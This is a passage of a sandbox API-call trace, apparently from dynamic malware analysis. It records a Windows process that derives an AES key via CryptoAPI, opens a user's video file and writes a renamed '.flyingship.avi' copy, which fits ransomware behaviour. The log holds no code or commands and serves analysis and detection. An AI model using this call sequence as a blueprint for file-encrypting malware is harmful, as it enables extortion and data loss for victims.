Size=0x8) returned 0x8e1900 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0193.644] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0193.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954c2e20, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xbfc92110, ftLastAccessTime.dwHighDateTime=0x1d5e425, ftLastWriteTime.dwLowDateTime=0xbfc92110, ftLastWriteTime.dwHighDateTime=0x1d5e425, nFileSizeHigh=0x0, nFileSizeLow=0xb330, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="xhiatAIn2v.avi", cAlternateFileName="XHIATA~1.AVI")) returned 0x90af58 [0193.645] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0193.645] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.645] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0193.645] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.645] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.645] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0193.645] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.645] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0193.645] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.645] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.645] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0193.646] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.646] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.646] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.646] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.646] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0193.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.646] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0193.647] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.653] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.653] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0193.653] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.653] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.653] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.653] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.653] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0193.653] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.653] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.653] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.653] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.653] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.653] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.654] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0193.654] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.654] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.654] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0193.654] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.654] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0193.654] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.654] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0193.654] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.654] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.654] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.654] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.654] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.654] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.654] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.654] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0193.655] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.655] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.655] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0193.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.655] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0193.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.655] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.655] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.655] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.655] CryptHashData (hHash=0x90ae18, pbData=0x8ded08, dwDataLen=0x19, dwFlags=0x1) returned 1 [0193.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.655] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0193.656] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0193.656] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.656] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0193.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0193.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0193.656] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.656] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.656] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0193.657] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.657] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0193.657] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.657] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.657] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.657] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.657] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0193.657] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.657] CryptDestroyHash (hHash=0x90ae18) returned 1 [0193.657] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.657] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.657] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0193.658] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0193.658] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\xhiatain2v.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0193.659] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.659] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0193.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0193.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0193.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0193.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0193.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0193.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0193.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0193.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0193.660] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0193.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0193.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0193.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0193.660] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0193.660] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0193.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0193.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0193.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0193.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0193.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0193.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0193.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0193.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0193.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0193.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0193.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0193.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0193.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0193.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0193.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0193.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0193.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0193.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0193.662] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp")) returned 0x10 [0193.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0193.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0193.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0193.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0193.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0193.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0193.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0193.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0193.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0193.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0193.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.flyingship.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\xhiatain2v.flyingship.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0193.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0193.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0193.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0193.664] HeapFree (in: 